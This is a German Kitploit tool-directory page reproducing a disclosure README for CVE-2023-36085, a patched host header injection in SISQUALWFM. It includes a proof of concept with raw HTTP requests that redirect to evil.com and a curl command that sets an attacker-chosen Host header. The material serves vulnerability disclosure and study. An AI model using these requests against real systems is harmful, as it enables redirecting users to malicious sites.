Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-36085_SISQUALWFM-Host-Header-Injection — Dieses Repository enthält Informationen zu CVE-2023-36085, einer Host-Header-Injection-Schwachstelle, die in SISQUALWFM Version 7.1.319.103 entdeckt wurde und es einem Angreifer ermöglicht, Weblinks zu manipulieren oder Benutzer auf eine bösartige Website umzuleiten. Dieser Schwachstelle wurde CVE-2023-36085 zugewiesen und sie wurde in Version 7.1.319.111 und höher behoben. | Kitploit
Tools/GitHubGitHub/omershaik0/cve-2023-36085_sisqualwfm-host-header-injection
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungWebsicherheitPenetrationstests
GitHubomershaik0/cve-2023-36085_sisqualwfm-host-header-injection

CVE-2023-36085_SISQUALWFM-Host-Header-Injection

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

Repository anzeigen
vor 2 JahrenNoch nicht geprüft

Dieses Repository enthält Informationen zu CVE-2023-36085, einer Host-Header-Injection-Schwachstelle, die in SISQUALWFM Version 7.1.319.103 entdeckt wurde und es einem Angreifer ermöglicht, Weblinks zu manipulieren oder Benutzer auf eine bösartige Website umzuleiten. Dieser Schwachstelle wurde CVE-2023-36085 zugewiesen und sie wurde in Version 7.1.319.111 und höher behoben.

Teilen

CVE-2023-36085 SISQUALWFM Host-Header-Injection-Schwachstelle

Dieses Repository enthält Informationen zu einer Host-Header-Injection-Schwachstelle, die in SISQUALWFM Version 7.1.319.103 entdeckt wurde. Sie ermöglicht es einem Angreifer, Webseiten-Links zu manipulieren oder Benutzer auf eine bösartige Website umzuleiten. Dieser Schwachstelle wurde CVE-2023-36085 zugewiesen und sie wurde in Version 7.1.319.111 und höher behoben.

Details zur Schwachstelle

  • Exploit-Titel: SISQUALWFM 7.1.319.103 Host Header Injection
  • Entdeckt am: 17/03/2023
  • Gemeldet am: 17/03/2023
  • Behoben am: 13/10/2023
  • Exploit-Autor: Omer Shaik (unknown_exploit)
  • Hersteller-Website: SISQUALWFM
  • Version: 7.1.319.103
  • Getestet auf: SISQUAL WFM 7.1.319.103
  • Betroffene Version: SISQUALWFM 7.1.319.103
  • Behobene Version: SISQUALWFM 7.1.319.111
  • CVE: CVE-2023-36085
  • CVSS-Score: 3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
  • Kategorie: Web-Apps

Proof of Concept

Wir stellen ein Proof-of-Concept-Szenario zur Verfügung, das die Host-Header-Injection-Schwachstelle demonstriert, insbesondere gegen den Endpunkt /sisqualIdentityServer/core. Diese Schwachstelle ermöglicht es einem Angreifer, Webseiten-Links zu manipulieren oder Benutzer auf eine andere Website umzuleiten, indem er den Host-Header verändert.

Ursprüngliche Anfrage

root@kitploit:~
GET /sisqualIdentityServer/core/login HTTP/2
Host: sisqualwfm.cloud
Cookie: <cookie>
...

Ursprüngliche Antwort

root@kitploit:~
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://sisqualwfm.cloud/sisqualIdentityServer/core/
...

Abgefangene Anfrage (geändert, um auf evil.com umzuleiten)

root@kitploit:~
GET /sisqualIdentityServer/core/login HTTP/2
Host: evil.com
Cookie: <cookie>
...

Antwort

root@kitploit:~
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://evil.com/sisqualIdentityServer/core/
...

Ausführung des Exploits

Angriffsmethode

Um diese Schwachstelle auszunutzen, kann ein Angreifer den folgenden curl-Befehl verwenden, um den Host-Header zu ändern:

root@kitploit:~
curl -k --header "Host: attack.host.com" "Domain Name + /sisqualIdentityServer/core" -vvv

Haftungsausschluss

Dieses Repository dient ausschließlich zu Informationszwecken und sollte nicht für böswillige Aktivitäten verwendet werden. Die Schwachstelle wurde dem Hersteller verantwortungsvoll offengelegt und das Problem wurde behoben. Es ist von entscheidender Bedeutung, ethische Hacking-Richtlinien zu befolgen und die Praktiken der verantwortungsvollen Offenlegung (Responsible Disclosure) zu respektieren, wenn Schwachstellen identifiziert und gemeldet werden.

Tool herunterladen